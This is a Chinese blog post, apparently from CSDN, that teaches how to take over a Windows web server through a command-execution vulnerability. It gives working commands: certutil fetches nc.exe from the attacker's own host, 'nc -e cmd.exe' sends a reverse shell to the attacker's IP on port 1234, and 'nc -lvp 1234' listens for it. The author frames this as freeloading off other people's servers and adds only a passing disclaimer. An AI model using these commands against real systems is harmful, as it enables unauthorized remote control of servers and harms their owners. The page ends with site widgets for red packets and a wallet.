一种拿站方法(利用netcat反弹shell)

今天我想分享一下最近了解到的一个白嫖方法(滑稽),就是利用netcat反弹对方的shell

首先我们了解一下windows防火墙的一些机制,它对出站的数据管控非常宽松,而对于入站的数据管控非常严格,所以我们可以通过命令执行漏洞来上传一个nc(netcat)的exe(这里是针对于windows)文件,再利用nc的shell反弹功能白嫖对方服务器。

这是netcat关于windows版的下载地址  netcat 1.11 for Win32/Win64 

首先,对于一些存在命令执行漏洞的网站,我们可以利用我们自己搭建的网站(经费在燃烧,当然,我并没有开通一个网站),通过命令下载我们自己服务器的nc.exe

certutil -urlcache -split -f http://www.hahaha.com/nc.exe nc.exe

如果对方下载成功并命名为nc.exe,我们就可以通过命令执行使用nc反弹shell了

 nc -e cmd.exe 自己搭建的网站的ip 端口号 (假设为1234)

然后我们在自己的服务器上面使用nc监听1234端口,其实我们应该先将反弹shell的命令写好但先不执行,先执行监听命令

nc -lvp 1234

监听之后就是这样的,我要本地主机与虚拟机演示一下

 

 

 

 

 

 

所以呢,这就是反弹shell,就到这里了,其实我们可以去找一些在线靶场搞一下(菜汪),白嫖一下,但是我并不建议大家这么搞哦。 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值